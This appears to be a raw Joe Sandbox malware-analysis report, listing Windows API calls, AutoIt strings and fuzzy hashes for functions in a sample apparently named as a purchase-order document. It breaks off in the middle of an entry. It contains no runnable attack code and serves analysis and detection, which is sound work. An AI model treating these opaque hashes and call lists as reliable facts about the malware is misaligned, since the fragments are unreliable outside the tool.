                                                                                    Similarity
                                                                                    • API ID: _memcmp
                                                                                    • String ID:
                                                                                    • API String ID: 2931989736-0
                                                                                    • Opcode ID: 2fe07dbba7ad236e8eeec37aa864d2012b78e55dd28c9277d265d0652131e568
                                                                                    • Instruction ID: 74716c2b8114f227df25b31af76b7b15f0b1c8f80eec01d09a240a0ad510bea9
                                                                                    • Opcode Fuzzy Hash: 2fe07dbba7ad236e8eeec37aa864d2012b78e55dd28c9277d265d0652131e568
                                                                                    • Instruction Fuzzy Hash: 3421DB69748A0977D71855208E82FFB335FBF323A4F484025FD1A9A781F720EE3181A5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: NULL Pointer assignment$Not an Object type
                                                                                    • API String ID: 0-572801152
                                                                                    • Opcode ID: 8ce45eeba7bbcb7bd583747f47a781bbefda65fbee0419128a1c90d8e435046f
                                                                                    • Instruction ID: c53a0d67c86415c69087cc13fdb2aea32fb4a0e0d2f11247d832910934612205
                                                                                    • Opcode Fuzzy Hash: 8ce45eeba7bbcb7bd583747f47a781bbefda65fbee0419128a1c90d8e435046f
                                                                                    • Instruction Fuzzy Hash: EED1B075A0060A9FDF10CF98C885FAEB7B6BF58344F14856DE915AB281D770ED81CB90
                                                                                    APIs
                                                                                    • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,001817FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 001815CE
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,001817FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00181651
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,001817FB,?,001817FB,00000000,00000000,?,00000000,?,?,?,?), ref: 001816E4
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,001817FB,00000000,00000000,?,00000000,?,?,?,?), ref: 001816FB
                                                                                      • Part of subcall function 00173820: RtlAllocateHeap.NTDLL(00000000,?,00211444,?,0015FDF5,?,?,0014A976,00000010,00211440,001413FC,?,001413C6,?,00141129), ref: 00173852
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,001817FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00181777
                                                                                    • __freea.LIBCMT ref: 001817A2
                                                                                    • __freea.LIBCMT ref: 001817AE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                    • String ID:
                                                                                    • API String ID: 2829977744-0
                                                                                    • Opcode ID: e1a09724ebef1f38a29b79038ad0c3a4d16eb5a8024e77a84e636626c5980124
                                                                                    • Instruction ID: 53f8a9fdaf598b1d3773d40e01fce10c1fdd68742a462f63e6299ccc2086b91f
                                                                                    • Opcode Fuzzy Hash: e1a09724ebef1f38a29b79038ad0c3a4d16eb5a8024e77a84e636626c5980124
                                                                                    • Instruction Fuzzy Hash: 1E91C773E00216BADB24AE74CC81AEE7BBDAF59310F184659E905E7141D735DE42CF60
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Variant$ClearInit
                                                                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                    • API String ID: 2610073882-625585964
                                                                                    • Opcode ID: c9e8ad0acd72c6f964087cd9b4ff51cc41d6b9df6e3a768569499b163f30e72d
                                                                                    • Instruction ID: fc5ac22c939f33a2c64e1c99a576e87f13b81c7fbbc6b0a749abc7d149c4dce0
                                                                                    • Opcode Fuzzy Hash: c9e8ad0acd72c6f964087cd9b4ff51cc41d6b9df6e3a768569499b163f30e72d
                                                                                    • Instruction Fuzzy Hash: F6919C71A04319ABDF24CFA4C898FAEBBB8EF66710F10855DF505AB281D770D945CBA0
                                                                                    APIs
                                                                                    • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 001B125C
                                                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 001B1284
                                                                                    • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 001B12A8
                                                                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 001B12D8
                                                                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 001B135F
                                                                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 001B13C4
                                                                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 001B1430
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                    • String ID:
                                                                                    • API String ID: 2550207440-0
                                                                                    • Opcode ID: 647a479eadf05acc095a95339306ae11946279fdc7e215aadbc2a1881d12095f
                                                                                    • Instruction ID: c4fe7d0331b2a9220d723b435ea2f032bdb413b68016efe09b9ef8bb94099db6
                                                                                    • Opcode Fuzzy Hash: 647a479eadf05acc095a95339306ae11946279fdc7e215aadbc2a1881d12095f
                                                                                    • Instruction Fuzzy Hash: E3910572A00219BFDB00DFA8C8A4BFE77B5FF55315F624469E900EB291D774A941CB90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: ObjectSelect$BeginCreatePath
                                                                                    • String ID:
                                                                                    • API String ID: 3225163088-0
                                                                                    • Opcode ID: 9c89f50c51ff55d98e7f4028c034864708874e4d28d1bcd9de34b8b30e640b17
                                                                                    • Instruction ID: 6add2962bbd148e63110789368eb56b361dc978ef82fe989c2b13c1c8fca83dd
                                                                                    • Opcode Fuzzy Hash: 9c89f50c51ff55d98e7f4028c034864708874e4d28d1bcd9de34b8b30e640b17
                                                                                    • Instruction Fuzzy Hash: 20914971D10219EFCB14CFA9CC84AEEBBB8FF48320F144556E915BB251D378AA55CB60
                                                                                    APIs
                                                                                    • VariantInit.OLEAUT32(?), ref: 001C396B
                                                                                    • CharUpperBuffW.USER32(?,?), ref: 001C3A7A
                                                                                    • _wcslen.LIBCMT ref: 001C3A8A
                                                                                    • VariantClear.OLEAUT32(?), ref: 001C3C1F
                                                                                      • Part of subcall function 001B0CDF: VariantInit.OLEAUT32(00000000), ref: 001B0D1F
                                                                                      • Part of subcall function 001B0CDF: VariantCopy.OLEAUT32(?,?), ref: 001B0D28
                                                                                      • Part of subcall function 001B0CDF: VariantClear.OLEAUT32(?), ref: 001B0D34
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                    • API String ID: 4137639002-1221869570
                                                                                    • Opcode ID: 34297fa05f921f1b8cb802789a10ecd5216fea5c90ca32d6be20c72414d2807e
                                                                                    • Instruction ID: 8bd070a31234bf4d48f83115c957d79c745b00f2615bf8e54267e7783fd68c95
                                                                                    • Opcode Fuzzy Hash: 34297fa05f921f1b8cb802789a10ecd5216fea5c90ca32d6be20c72414d2807e
                                                                                    • Instruction Fuzzy Hash: 71918A75A083059FC704DF28C480A6AB7E4FFA9314F14892EF8999B351DB31EE45CB92
                                                                                    APIs
                                                                                      • Part of subcall function 001A000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0019FF41,80070057,?,?,?,001A035E), ref: 001A002B
                                                                                      • Part of subcall function 001A000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0019FF41,80070057,?,?), ref: 001A0046
                                                                                      • Part of subcall function 001A000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0019FF41,80070057,?,?), ref: 001A0054
                                                                                      • Part of subcall function 001A000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0019FF41,80070057,?), ref: 001A0064
                                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 001C4C51
                                                                                    • _wcslen.LIBCMT ref: 001C4D59
                                                                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 001C4DCF
                                                                                    • CoTaskMemFree.OLE32(?), ref: 001C4DDA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                    • String ID: NULL Pointer assignment
                                                                                    • API String ID: 614568839-2785691316
                                                                                    • Opcode ID: 8b2de5f7b66792d9da824436f93ef1b41b5d8d44f0c0ba6bc97e3f2c60d7a04f
                                                                                    • Instruction ID: 5d217f485b885ebc6c52522a58b3b31c5cf02bcdd3947c5d9f444d4c8a5bd60b
                                                                                    • Opcode Fuzzy Hash: 8b2de5f7b66792d9da824436f93ef1b41b5d8d44f0c0ba6bc97e3f2c60d7a04f
                                                                                    • Instruction Fuzzy Hash: 8D913771D0121DAFDF14DFA4D890EEEB7B8BF28304F10856AE915AB251DB349A44CFA0
                                                                                    APIs
                                                                                    • GetMenu.USER32(?), ref: 001D2183
                                                                                    • GetMenuItemCount.USER32(00000000), ref: 001D21B5
                                                                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 001D21DD
                                                                                    • _wcslen.LIBCMT ref: 001D2213
                                                                                    • GetMenuItemID.USER32(?,?), ref: 001D224D
                                                                                    • GetSubMenu.USER32(?,?), ref: 001D225B
                                                                                      • Part of subcall function 001A3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 001A3A57
                                                                                      • Part of subcall function 001A3A3D: GetCurrentThreadId.KERNEL32 ref: 001A3A5E
                                                                                      • Part of subcall function 001A3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,001A25B3), ref: 001A3A65
                                                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 001D22E3
                                                                                      • Part of subcall function 001AE97B: Sleep.KERNEL32 ref: 001AE9F3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                    • String ID:
                                                                                    • API String ID: 4196846111-0
                                                                                    • Opcode ID: 92fef21a61a25e3e297979509c2ecdb942bc043371d95f64476d707c03dc20e5
                                                                                    • Instruction ID: 44d69e71a542ee60c58171a27f6173b919b669da198e6bec3e22411fc33bc7e7
                                                                                    • Opcode Fuzzy Hash: 92fef21a61a25e3e297979509c2ecdb942bc043371d95f64476d707c03dc20e5
                                                                                    • Instruction Fuzzy Hash: 40719E35A00215AFCB14DFA8C845AAEB7F1FF68310F15845AE826EB351D735EE41CB90
                                                                                    APIs
                                                                                    • GetParent.USER32(?), ref: 001AAEF9
                                                                                    • GetKeyboardState.USER32(?), ref: 001AAF0E
                                                                                    • SetKeyboardState.USER32(?), ref: 001AAF6F
                                                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 001AAF9D
                                                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 001AAFBC
                                                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 001AAFFD
                                                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 001AB020
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                    • String ID:
                                                                                    • API String ID: 87235514-0
                                                                                    • Opcode ID: 28ceb9a80e26647073a1757fc882646b810f48ebc67ce9139008e9381224d5e3
                                                                                    • Instruction ID: 38d35a469efc56924760da17f96b60b43507851256acfe20058a3ec2933f0048
                                                                                    • Opcode Fuzzy Hash: 28ceb9a80e26647073a1757fc882646b810f48ebc67ce9139008e9381224d5e3
                                                                                    • Instruction Fuzzy Hash: 1E5181A46087D53DFB3A42348C85BBABEA95F07304F08858AF1D9958C3D7A9ACC4D751
                                                                                    APIs
                                                                                    • GetParent.USER32(00000000), ref: 001AAD19
                                                                                    • GetKeyboardState.USER32(?), ref: 001AAD2E
                                                                                    • SetKeyboardState.USER32(?), ref: 001AAD8F
                                                                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 001AADBB
                                                                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 001AADD8
                                                                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 001AAE17
                                                                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 001AAE38
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                    • String ID:
                                                                                    • API String ID: 87235514-0
                                                                                    • Opcode ID: f7311172bb16626a8982aea4d6a19cdae92fef72a87e71b2d99bb23fa6f5002b
                                                                                    • Instruction ID: d81f80a58caecf3445e4906ebac908720fc185a647c680b63336ae9f10a2a2a7
                                                                                    • Opcode Fuzzy Hash: f7311172bb16626a8982aea4d6a19cdae92fef72a87e71b2d99bb23fa6f5002b
                                                                                    • Instruction Fuzzy Hash: CE51E3A55487D53DFB3783748C95BBABEA85F47300F488489E1D5468C3D3A4EC88E762
                                                                                    APIs
                                                                                    • GetConsoleCP.KERNEL32(00183CD6,?,?,?,?,?,?,?,?,00175BA3,?,?,00183CD6,?,?), ref: 00175470
                                                                                    • __fassign.LIBCMT ref: 001754EB
                                                                                    • __fassign.LIBCMT ref: 00175506
                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00183CD6,00000005,00000000,00000000), ref: 0017552C
                                                                                    • WriteFile.KERNEL32(?,00183CD6,00000000,00175BA3,00000000,?,?,?,?,?,?,?,?,?,00175BA3,?), ref: 0017554B
                                                                                    • WriteFile.KERNEL32(?,?,00000001,00175BA3,00000000,?,?,?,?,?,?,?,?,?,00175BA3,?), ref: 00175584
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                    • String ID:
                                                                                    • API String ID: 1324828854-0
                                                                                    • Opcode ID: 6b5c45993f5f2621c874f47a1e718bd0bf23be3e24716d3633a227feeb910bd0
                                                                                    • Instruction ID: a42ca37186b2e90a0e20513ada7ef88d654c8a2a57b1f2af5489fca14110fe20
                                                                                    • Opcode Fuzzy Hash: 6b5c45993f5f2621c874f47a1e718bd0bf23be3e24716d3633a227feeb910bd0
                                                                                    • Instruction Fuzzy Hash: 0851C6719006499FDB10CFA8D885AEEBBFAEF09300F14851AF559E7291E7709A41CB60
                                                                                    APIs
                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00162D4B
                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00162D53
                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00162DE1
                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00162E0C
                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00162E61
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                    • String ID: csm
                                                                                    • API String ID: 1170836740-1018135373
                                                                                    • Opcode ID: 2b75e032e8f88fbec625ac0e66f634d498efd7cc6bfd8cc2b62d7007522a88fa
                                                                                    • Instruction ID: ae4ef51556ff0a1a82be82e8a2d1c88de12c69344df9d5b8f310616fe4f4a0e4
                                                                                    • Opcode Fuzzy Hash: 2b75e032e8f88fbec625ac0e66f634d498efd7cc6bfd8cc2b62d7007522a88fa
                                                                                    • Instruction Fuzzy Hash: 4E41D234E00609ABCF10DFA8CC85ADEBBB5BF45324F148165E814AB392D771AA61CBD0
                                                                                    APIs
                                                                                      • Part of subcall function 001C304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 001C307A
                                                                                      • Part of subcall function 001C304E: _wcslen.LIBCMT ref: 001C309B
                                                                                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 001C1112
                                                                                    • WSAGetLastError.WSOCK32 ref: 001C1121
                                                                                    • WSAGetLastError.WSOCK32 ref: 001C11C9
                                                                                    • closesocket.WSOCK32(00000000), ref: 001C11F9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                    • String ID:
                                                                                    • API String ID: 2675159561-0
                                                                                    • Opcode ID: 42825b03b3e9bf434311ed2c6ed0d0cae9097ca40383313ad9aa897f3af0e55f
                                                                                    • Instruction ID: 0d7787d9cd48ae536eed5d370c86f43810aa1d45ee6715c4d49ca4dbb3880f2a
                                                                                    • Opcode Fuzzy Hash: 42825b03b3e9bf434311ed2c6ed0d0cae9097ca40383313ad9aa897f3af0e55f
                                                                                    • Instruction Fuzzy Hash: 3141E531601205AFDB109F24C884FA9B7E9FF56324F188159FD159B292C778ED81CBE1
                                                                                    APIs
                                                                                      • Part of subcall function 001ADDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,001ACF22,?), ref: 001ADDFD
                                                                                      • Part of subcall function 001ADDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,001ACF22,?), ref: 001ADE16
                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 001ACF45
                                                                                    • MoveFileW.KERNEL32(?,?), ref: 001ACF7F
                                                                                    • _wcslen.LIBCMT ref: 001AD005
                                                                                    • _wcslen.LIBCMT ref: 001AD01B
                                                                                    • SHFileOperationW.SHELL32(?), ref: 001AD061
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                    • String ID: \*.*
                                                                                    • API String ID: 3164238972-1173974218
                                                                                    • Opcode ID: e5ec7e1c8d1df9b2f64c7af100e8cbce81fc4b633ab105468de6fbd9f05b65c7
                                                                                    • Instruction ID: 22b7972cda2c5b6bb388edaf8f3b1e5f5f87b643644350c1fbae7d8076779d0d
